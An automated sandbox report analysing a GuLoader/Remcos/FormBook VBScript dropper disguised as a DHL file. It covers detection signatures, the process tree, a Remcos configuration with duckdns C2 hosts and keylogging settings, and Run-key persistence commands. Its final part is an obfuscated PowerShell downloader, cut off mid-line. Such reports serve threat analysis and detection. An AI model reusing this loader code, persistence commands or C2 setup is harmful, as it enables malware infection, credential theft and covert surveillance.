Windows Analysis Report
DHL_ES567436735845755676678877988975877.vbs

Overview

General Information

Sample name:DHL_ES567436735845755676678877988975877.vbs
Analysis ID:1431984
MD5:d0d8e78e99c4c59061e7caa5d254e8e9
SHA1:f06eff42be48b3ff12d8597fc4a155a293ed4236
SHA256:0895ad5d19828edc6d17054edb6d9eebdec60e587167716f2271bd683290aaf8
Tags:vbs
Infos:

Detection

FormBook, GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1992 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4028 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2668 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2944 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1496 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 2140 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 6548 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wscript.exe (PID: 6984 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • powershell.exe (PID: 5804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 3996 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 6324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 1848 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 5144 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                • wab.exe (PID: 1968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • cmd.exe (PID: 6444 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • reg.exe (PID: 4296 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
                  • qDlmBUIvkRrWNd.exe (PID: 1776 cmdline: "C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • clip.exe (PID: 6720 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
                      • qDlmBUIvkRrWNd.exe (PID: 5244 cmdline: "C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 6292 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • wab.exe (PID: 6624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4220 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5036 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6668 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • wab.exe (PID: 3252 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6148 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution:
  • SWEED
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\mvourhjs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
            Source | Rule | Description | Author | Strings
            amsi64_2132.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xfd2e:$b2: ::FromBase64String(
            • 0xd0a9:$s1: -join
            • 0x10fa2:$s3: Reverse
            • 0x6855:$s4: +=
            • 0x6917:$s4: +=
            • 0xab3e:$s4: +=
            • 0xcc5b:$s4: +=
            • 0xcf45:$s4: +=
            • 0xd08b:$s4: +=
            • 0xf2da:$s4: +=
            • 0xf35a:$s4: +=
            • 0xf420:$s4: +=
            • 0xf4a0:$s4: +=
            • 0xf676:$s4: +=
            • 0xf6fa:$s4: +=
            • 0xd7c3:$e4: Get-WmiObject
            • 0xd9b2:$e4: Get-Process
            • 0xda0a:$e4: Start-Process
            amsi32_2668.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xfc80:$b2: ::FromBase64String(
            • 0xd0a9:$s1: -join
            • 0x10ef4:$s3: Reverse
            • 0x6855:$s4: +=
            • 0x6917:$s4: +=
            • 0xab3e:$s4: +=
            • 0xcc5b:$s4: +=
            • 0xcf45:$s4: +=
            • 0xd08b:$s4: +=
            • 0xf2da:$s4: +=
            • 0xf35a:$s4: +=
            • 0xf420:$s4: +=
            • 0xf4a0:$s4: +=
            • 0xf676:$s4: +=
            • 0xf6fa:$s4: +=
            • 0xd7c3:$e4: Get-WmiObject
            • 0xd9b2:$e4: Get-Process
            • 0xda0a:$e4: Start-Process
            • 0x1779d:$e4: Get-Process
            amsi32_5804.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xc4cd:$b2: ::FromBase64String(
            • 0x9861:$s1: -join
            • 0x300d:$s4: +=
            • 0x30cf:$s4: +=
            • 0x72f6:$s4: +=
            • 0x9413:$s4: +=
            • 0x96fd:$s4: +=
            • 0x9843:$s4: +=
            • 0xba9e:$s4: +=
            • 0xbb1e:$s4: +=
            • 0xbbe4:$s4: +=
            • 0xbc64:$s4: +=
            • 0xbe3a:$s4: +=
            • 0xbebe:$s4: +=
            • 0x9f87:$e4: Get-WmiObject
            • 0xa176:$e4: Get-Process
            • 0xa1ce:$e4: Start-Process
            amsi32_6324.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xc437:$b2: ::FromBase64String(
            • 0x9861:$s1: -join
            • 0x300d:$s4: +=
            • 0x30cf:$s4: +=
            • 0x72f6:$s4: +=
            • 0x9413:$s4: +=
            • 0x96fd:$s4: +=
            • 0x9843:$s4: +=
            • 0xba9e:$s4: +=
            • 0xbb1e:$s4: +=
            • 0xbbe4:$s4: +=
            • 0xbc64:$s4: +=
            • 0xbe3a:$s4: +=
            • 0xbebe:$s4: +=
            • 0x9f87:$e4: Get-WmiObject
            • 0xa176:$e4: Get-Process
            • 0xa1ce:$e4: Start-Process
            • 0x134fc:$e4: Get-Process

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , ProcessId: 6984, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , ProcessId: 6984, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", ProcessId: 1992, ProcessName: wscript.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 2140, ProcessName: cmd.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vibeka
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 6548, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 2140, ProcessName: cmd.exe
            Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vibeka
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", ProcessId: 1992, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. 
FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO 